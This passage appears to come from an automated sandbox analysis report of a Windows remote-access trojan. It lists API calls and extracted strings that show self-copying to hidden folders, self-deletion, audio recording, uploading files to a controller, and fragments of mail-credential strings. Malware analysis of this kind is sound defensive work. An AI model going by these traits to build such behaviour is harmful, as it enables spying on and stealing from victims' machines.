                                                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                    APIs
                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                    • String ID: .exe$0%s$WDH$exepath$open$temp_
                                                                    • API String ID: 2649220323-2673516112
                                                                    • Opcode ID: 4f95786cf2f2c00e5bb866ed93791c3a94b5cceb6ba25eb1f7637f0f1d303f44
                                                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                    • Opcode Fuzzy Hash: 4f95786cf2f2c00e5bb866ed93791c3a94b5cceb6ba25eb1f7637f0f1d303f44
                                                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                    APIs
                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                    • SetEvent.KERNEL32 ref: 0041B219
                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                    • API String ID: 738084811-2094122233
                                                                    • Opcode ID: 8c8eb39fca7e9d4865f8753aeec9ef2e47b6f0d64e25d1629d5d06c51376f39f
                                                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                    • Opcode Fuzzy Hash: 8c8eb39fca7e9d4865f8753aeec9ef2e47b6f0d64e25d1629d5d06c51376f39f
                                                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Write$Create
                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                    • API String ID: 1602526932-4212202414
                                                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000001,0040764D,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                    • API String ID: 1646373207-2432978780
                                                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                    APIs
                                                                      • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                      • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                      • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                    • _strlen.LIBCMT ref: 10001855
                                                                    • _strlen.LIBCMT ref: 10001869
                                                                    • _strlen.LIBCMT ref: 1000188B
                                                                    • _strlen.LIBCMT ref: 100018AE
                                                                    • _strlen.LIBCMT ref: 100018C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                    • API String ID: 3296212668-3023110444
                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0040CE07
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                                    • _wcslen.LIBCMT ref: 0040CEE6
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000000,00000000), ref: 0040CF84
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                    • _wcslen.LIBCMT ref: 0040CFC6
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                    • ExitProcess.KERNEL32 ref: 0040D062
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                    • String ID: 6$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$del$hdF$open
                                                                    • API String ID: 1579085052-1802359246
                                                                    • Opcode ID: 2dc9a803916b22344f0ef8c64b2c3f5cf2c8e3c77414b11eb312e42c25182a99
                                                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                    • Opcode Fuzzy Hash: 2dc9a803916b22344f0ef8c64b2c3f5cf2c8e3c77414b11eb312e42c25182a99
                                                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                    • _wcslen.LIBCMT ref: 0041C13B
                                                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                    • GetLastError.KERNEL32 ref: 0041C173
                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                    • String ID: ?
                                                                    • API String ID: 3941738427-1684325040
                                                                    • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                    • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                    • API String ID: 4218353326-230879103
                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 3899193279-0
                                                                    • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                    • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                    • __aulldiv.LIBCMT ref: 00408D4D
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                                                    • API String ID: 3086580692-1206044436
                                                                    • Opcode ID: db688c23cf025413b26945f168b6b3d1465abe372ee564f29d25b7a1444e94a0
                                                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                    • Opcode Fuzzy Hash: db688c23cf025413b26945f168b6b3d1465abe372ee564f29d25b7a1444e94a0
                                                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                    • ExitProcess.KERNEL32 ref: 0041D665
                                                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                    • String ID: Close
                                                                    • API String ID: 1657328048-3535843008
                                                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$Info
                                                                    • String ID:
                                                                    • API String ID: 2509303402-0
                                                                    • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                    • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                    APIs
                                                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
